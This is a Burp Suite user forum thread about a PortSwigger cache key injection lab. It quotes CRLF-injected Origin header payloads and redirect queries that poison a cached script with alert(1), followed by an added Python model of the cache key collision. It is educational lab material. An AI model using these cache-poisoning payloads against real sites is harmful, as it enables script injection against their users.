The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Lab: Cache key injection

Ariel | Last updated: Feb 03, 2021 08:48PM UTC

Hi, I want to know why, on the JS page, we put 4 dollar signs inside the Origin header and not 2.

GET /js/localize.js?lang=en?utm_content=z&cors=1&x=1 HTTP/1.1
Origin: x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$

Uthman, PortSwigger Agent | Last updated: Feb 04, 2021 04:45PM UTC

Hi Ariel,

In this lab, the caching key has the following structure: 'path?query$$origin'

When we poison the cache on the 'js/localize.js' page with the Origin header, the caching key becomes:

'/js/localize.js?lang=en?cors=1&x=1$$Origin=x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$'

After that, we poison 'login?lang=en' so that it redirects to:

'/login/?lang=enx?utm_content=x%26cors=1%26x=1$$Origin=x%250d%250aContent-Length:%208%250d%250a%250d%250aalert(1)$$%23'

and the '/js/localize.js' script is fetched with the same query. When the script is fetched after the redirection, since it is a same-origin request, the Origin header will be empty. So the actual key will be the redirection query + '$$' + (blank origin). So the key will be the same:

'/js/localize.js?lang=en?cors=1&x=1$$Origin=x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$'

Hence we receive the poisoned response.
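
The key collision described in the reply above, modelled in Python as an added example (this is not code from the lab or from PortSwigger). It computes the cache key for the attacker's poisoning request and for the victim's same-origin script fetch after the redirect, and shows that only the four-dollar-sign Origin value makes the two keys equal. Beyond what the reply states, it assumes that the cache drops utm_content from the keyed query, appends "Origin=" plus the raw header value when an Origin header is present and nothing when it is absent, that the login page embeds the reflected lang value in a script tag of the form /js/localize.js?lang=...&cors=0, and it uses lang=en as in the keys the reply shows.

```python
import re
from typing import Optional, Tuple
from urllib.parse import unquote

# Added model of the lab cache's behaviour, not PortSwigger's code. Assumed:
# utm_content is unkeyed; the origin component is "Origin=" + the raw header
# value when present and empty when absent; the login page loads
# /js/localize.js?lang=<reflected lang>&cors=0.
SEP = "$$"


def cache_key(path: str, query: str, origin: Optional[str] = None) -> str:
    """Model of the key 'path?query$$origin' from the reply above."""
    keyed_query = re.sub(r"utm_content=[^&]*&?", "", query)  # unkeyed param
    origin_part = f"Origin={origin}" if origin is not None else ""
    return f"{path}?{keyed_query}{SEP}{origin_part}"


def victim_script_request(redirect_lang: str) -> Tuple[str, str]:
    """Path and query the victim's browser requests after the redirect.

    The reflected lang value is URL-decoded once by the server (%26 -> &,
    %25xx -> %xx, %23 -> #); the browser drops everything from '#' on (a
    fragment is never sent) and re-encodes the bare space as %20.
    """
    decoded = unquote(redirect_lang)
    src = f"/js/localize.js?lang={decoded}&cors=0"
    src = src.split("#", 1)[0].replace(" ", "%20")
    path, query = src.split("?", 1)
    return path, query


# Values taken from the thread (lang=en, as in the keys the reply shows).
INJECTED_ORIGIN = "x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$"
REDIRECT_LANG = ("en?utm_content=x%26cors=1%26x=1$$Origin="
                 "x%250d%250aContent-Length:%208%250d%250a%250d%250aalert(1)$$%23")


def poisoning_key(origin: str = INJECTED_ORIGIN) -> str:
    """Key under which the attacker's response gets cached."""
    return cache_key("/js/localize.js", "lang=en?utm_content=z&cors=1&x=1", origin)


def victim_key() -> str:
    """Key the cache computes for the victim's same-origin script fetch."""
    path, query = victim_script_request(REDIRECT_LANG)
    return cache_key(path, query)  # same-origin fetch: no Origin header


if __name__ == "__main__":
    print("attacker:", poisoning_key())
    print("victim:  ", victim_key())
    print("collide with $$$$:", poisoning_key() == victim_key())
    # With only two dollar signs the attacker's key is two characters short
    # of the victim's, so the poisoned response is never served to them.
    print("collide with $$:  ", poisoning_key(INJECTED_ORIGIN[:-2]) == victim_key())
```

The victim's URL already carries `$$` at the end of the fake `Origin=` component, and the cache appends a second `$$` because the same-origin fetch has no Origin header; the attacker's header value therefore has to end in `$$$$` to land on exactly that key.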

Ariel | Last updated: Feb 07, 2021 01:27PM UTC